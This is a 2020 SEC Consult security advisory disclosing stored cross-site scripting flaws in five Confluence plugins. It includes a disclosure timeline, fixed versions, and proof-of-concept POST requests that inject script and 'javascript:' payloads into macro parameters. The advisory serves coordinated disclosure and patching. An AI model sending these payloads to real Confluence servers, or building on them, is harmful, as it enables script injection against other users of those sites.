## https://sploitus.com/exploit?id=PACKETSTORM:159521
SEC Consult Vulnerability Lab Security Advisory < 20201008-0 >
=======================================================================
title: Multiple Cross-Site Scripting Vulnerabilities
products: PlantUML, Refined Toolkit for Confluence, Linking for Confluence, Countdown Timer, Server Status
vulnerable versions: PlantUML: 6.43, Refined Toolkit for Confluence: 2.2.5, Linking for Confluence: 5.5.3, Countdown Timer: 1.7.0, Server Status: 1.2.1
fixed version: PlantUML: 6.44, Refined Toolkit for Confluence: 2.2.7, Linking for Confluence: 5.5.7, Countdown Timer: 1.7.1, Server Status: 1.2.2
impact: Medium
homepage: PlantUML: https://marketplace.atlassian.com/apps/41025/plantuml-for-confluence
Refined Toolkit for Confluence: https://marketplace.atlassian.com/apps/1211136/refined-toolkit-for-confluence
Linking for Confluence: https://marketplace.atlassian.com/apps/166/linking-for-confluence
Countdown Timer: https://marketplace.atlassian.com/apps/1211116/countdown-timer
Server Status: https://marketplace.atlassian.com/apps/1212916/server-status
found: 2020-08-12
by: Daniel Teuchert (Office Bochum), Roman Ferdigg (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor & Product description:
-------------------
PlantUML
"Macros to add various UML diagrams and other diagrams"
Vendor: https://www.avono.de
Refined Toolkit for Confluence
"Improve Confluence Pages with Handy UI Tools"
Vendor: https://www.refined.com
Linking for Confluence
"Enable one-click links to access Confluence templates, aggregate resources, and create structured content"
Vendor: https://www.servicerocket.com
Countdown Timer
"Countdown widget for Confluence"
Vendor: www.akeles.com
Server Status
"A collection of some server status tools for confluence"
Vendor: https://aptis-solutions.com
Business recommendation:
------------------------
Update to the latest versions of the plugins. An in-depth security
analysis performed by security professionals is highly advised, as the
plugins may be affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) PlantUML - Stored Cross-Site Scripting
The Database Information macro is a component of PlantUML and can be used to
inject JavaScript code into Confluence pages, leading to a stored cross-site
scripting vulnerability.
2) Refined Toolkit for Confluence - Stored Cross-Site Scripting
The elements UI-Image and UI-Button can be used to inject JavaScript code into
Confluence pages, leading to a stored cross-site scripting vulnerability.
3) Linking for Confluence - Stored Cross-Site Scripting
The Link in New Windows macro can be used to inject JavaScript code into
Confluence pages, leading to a stored cross-site scripting vulnerability.
4) Countdown Timer - Stored Cross-Site Scripting
The Countdown Timer macro can be used to inject JavaScript code into Confluence
pages, leading to a stored cross-site scripting vulnerability.
5) Server Status - Stored Cross-Site Scripting
The two macros HTTP Status and SMTP Status can be used to inject JavaScript code
into Confluence pages, leading to a stored cross site scripting vulnerability.
Proof of concept:
-----------------
1) PlantUML - Stored Cross-Site Scripting
In the component Database Information a data source can be configured through
the parameter "datasources". This parameter allows an attacker to inject a
JavaScript code. The code is executed when a user visits the page where the
macro is used.
Below is the example on how the XSS issue can be exploited:
POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65623&draftShareId=ebaa1df3-0bb2-476f-9e83-560e87bdd9a5&
{"contentId":"65622","macro":{"name":"database-info","params":{"datasources":"<script>alert(document.domain)</script>","attributes":"sdfdsf"},"body":""}}
2) Refined Toolkit for Confluence - Stored Cross-Site Scripting
In the two components UI-Image and UI-Button the parameter "url" allows an
attacker to inject a JavaScript code. This code is executed when a user
clicks on the created image/button on the Confluence page.
The following request demonstrates the creation of such an UI-Image macro:
POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&
{"contentId":"65603","macro":{"name":"ui-image","params":{"imageUrl":"test","linkUrl":"javascript:alert(document.domain)"},"body":""}}
3) Linking for Confluence - Stored Cross-Site Scripting
The parameter "href" in the Link in New Window macro allows an attacker to
inject a JavaScript code. This code is executed when a user clicks on the
created Link on the Confluence page.
The following request demonstrates the creation of such a link:
POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65609&draftShareId=d0b7c806-ec40-4f56-8bdf-bd19474e8073&
{"contentId":"65603","macro":{"name":"link-window","params":{"href":"javascript:alert(document.domain)","linkText":"click here"},"body":""}}
4) Countdown Timer - Stored Cross-Site Scripting
In the Countdown Timer plugin it is possible to set a countdown date through
the parameter "countdowndate". This parameter allows an attacker to inject
a JavaScript code. The code is executed when a user visits the page where
the plugin is used.
Below is the example on how the XSS issue can be exploited:
POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65627&draftShareId=de758257-a056-479e-9e6a-eccdede26003&
{"contentId":"65626","macro":{"name":"countdown","params":{"countdowndate":"<script>alert(document.domain)</script>"},"body":""}}
5) Server Status - Stored Cross-Site Scripting
In the two components HTTP Status and SMTP status it is possible to set a text
through the parameter "displayText". This parameter allows an attacker to
inject a JavaScript code. The code is executed when a user visits the page
where the plugin is used.
Below is the example on how the XSS issue can be exploited:
POST /rest/tinymce/1/macro/placeholder HTTP/1.1
Host: confluence:8090
[...]
Referer: http://confluence:8090/pages/resumedraft.action?draftId=65619&draftShareId=efc17088-e2b6-4c29-9f0b-8ee90b4c03b7&
{"contentId":"65618","macro":{"name":"server-status-http-request","params":{"url":"http://test.com","displayText":"<script>alert(document.domain)</script>","theme":"Color"},"body":""}}
Vulnerable / tested versions:
-----------------------------
The following versions of the plugins have been tested, which were the latest
versions available at the time of the test.
PlantUML was tested in version 6.43.
Refined Toolkit for Confluence was tested in version 2.2.5.
Linking for Confluence was tested in version 5.5.3.
Countdown Timer was tested in version 1.7.0.
Server Status was tested in version 1.2.1.
It is assumed earlier versions of the plugins are also vulnerable to the issues.
Vendor contact timeline:
------------------------
PlantUML
2020-08-19: Contacting avono AG (PlantUML) through info@avono.de
2020-08-21: Vendor supplies PGP key for security contact
2020-08-21: Sending the details of the vulnerability
2020-08-25: Vendor releases fixed version 6.44
2020-10-08: Public release of the security advisory
Refined Toolkit for Confluence
2020-08-19: Contacting vendor through support@refined.com
2020-08-19: Vendor automatically creates Jira Ticket
2020-08-24: Vendor asks for information about the vulnerability via Jira
2020-08-24: Sending the details of the vulnerability
2020-08-26: Vendor releases fixed version 2.2.7
2020-10-08: Public release of the security advisory
Linking for Confluence
2020-08-19: Contacting vendor through apps.support@servicerocket.com
2020-08-19: Vendor automatically creates Jira Ticket
2020-08-19: Vendor supplies PGP key for security contact
2020-08-20: Sending the details of the vulnerability
2020-09-20: Vendor releases fixed version 5.5.7
2020-10-08: Public release of the security advisory
Countdown Timer
2020-08-19: Contacting Akeles Consulting (Countdown Timer) through help@akeles.com
2020-08-21: Vendor creates Jira Ticket and asks for information about the vulnerability via Jira
2020-08-21: Sending the details of the vulnerability
2020-09-17: Requesting a status update
2020-09-17: Vendor is working on it and there will be soon a new version
2020-09-22: Vendor was reminded about the latest possible release date
2020-09-28: Vendor will probably release the advisory in CW 40
2020-10-05: Requesting a status update
2020-10-06: Vendor releases fixed version 1.7.1
2020-10-08: Public release of the security advisory
Server Status
2020-08-19: Contacting APTIS GmbH (Server Status) through info@aptis.support
2020-08-31: Sending unencrypted advisory as requested by vendor
2020-08-31: Vendor releases fixed version 1.2.2
2020-10-08: Public release of the security advisory
Solution:
---------
PlantUML
The fixed version 6.44 is available at the Marketplace:
https://marketplace.atlassian.com/apps/41025/plantuml-for-confluence?hosting=server&tab=versions
Refined Toolkit for Confluence
The fixed version 2.2.7 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1211136/refined-toolkit-for-confluence?hosting=datacenter&tab=versions
Linking for Confluence
The fixed version 5.5.7 is available at the Marketplace:
https://marketplace.atlassian.com/apps/166/linking-for-confluence?hosting=cloud&tab=versions
Countdown Timer
The fixed version 1.7.1 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1211116/countdown-timer?hosting=server&tab=versions
Server Status
The fixed version 1.2.2 is available at the Marketplace:
https://marketplace.atlassian.com/apps/1212916/server-status?hosting=server&tab=versions
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF D. Teuchert, R. Ferdigg / @2020